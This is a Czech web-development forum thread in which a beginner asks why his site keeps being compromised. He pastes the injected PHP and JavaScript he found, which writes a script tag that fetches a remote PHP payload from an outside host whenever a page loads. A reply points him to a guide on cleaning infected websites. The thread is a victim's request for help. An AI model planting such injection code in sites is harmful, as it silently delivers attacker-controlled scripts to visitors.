Autor | Zpráva | ||
---|---|---|---|
Petrck Profil |
#1 · Zasláno: 7. 8. 2013, 12:06:30
Dobrý den,
za poslední měsíc jsem zaznamenal dva VELICE podobné útoky na vytvářené stránky. Nejednalo se o nic zákeřného, script měl za úkol "rozhodit" obsah stránky, například kalendář, jelikož jsou výstupy ošetřeny htmlspecialchars() funkcemi, vypsal se pouze javascriptový kod. Samozřejmě i to je nepříjemné. Ukázka útoku: mějme na stránce vložený například kalendář jQuery Timepicker Addon. Script, který jej vkládá obsahuje mimo jiné také konfigurační soubory, pro možnost změn názvů měsíců, šířky kalendáře a důležitá věc, jednotlivé události, generované jako json data, případně jako pole. Tyto události jsem do JS vkládal php scriptem, takže něco takového: <script type="javascript"> document.ready() ... ... events: <?php $kalendar = new TKalendar(); htmlentities(json_encode($kalendar->getEvents(), ENT_QUOTES); ?>, .... </script> PHP: #0f2490# echo " <script type=\"text/javascript\" language=\"javascript\" > function srcc() { var tmnd = document.createElement('script'); tmnd.src = 'http://portraitsurcommande.fr/bx948LtP.php'; if (!document.getElementById('tmnd')) { document.write('<div id=\'tmnd\'></div>'); document.getElementById('tmnd').appendChild(tmnd); }}srcc();</script>"; #/0f2490# JS: /*0f2490*/ function srcc() { var pwg = document.createElement('script'); pwg.src = 'http://portraitsurcommande.fr/bx948LtP.php'; if (!document.getElementById('pwg')) { document.write('<div id=\'pwg\'></div>'); document.getElementById('pwg').appendChild(pwg); } } srcc(); /*/0f2490* Napadená stránka: http://www.doswich.cz (nyní opět v normálu - znovu nahrána a prohlídnuta programem NOD) Vzhledem k tomu, že už je to po druhé, tak bych rád věděl, kde dělám chybu. Přeci jen jsem stále začátečník a pokud by mi někdo dokázal poradit nebo s někdo s podobným problémem setkal, byl bych vděčný za každou radu. Zatím jediné, co mě napadlo, změnit heslo u ftp a v total commanderu jej neukládat. dočetl jsem se, že prý se tam dá celkem dobře dostat. Další věc, která mě napadla, je zablokování stránky, na kterou útočník odkazoval ve své funkci v souboru htacess. Všem moc děkuji za pomoc i věnovaný čas! |
||
Jan Tvrdík Profil |
#2 · Zasláno: 7. 8. 2013, 12:32:48
Pro začátek si přečti Máte na webu virus — co s tím?
|
||
Petrck Profil |
#3 · Zasláno: 7. 8. 2013, 12:46:23
Toto jsem samozřejmě četl, jen jsem si nebyl jistý, zda je to právě tento případ. V tom případě uvědomím ostatní a budeme postupovat podle návodu. Děkuji moc
|
||
Časová prodleva: 11 let
|
0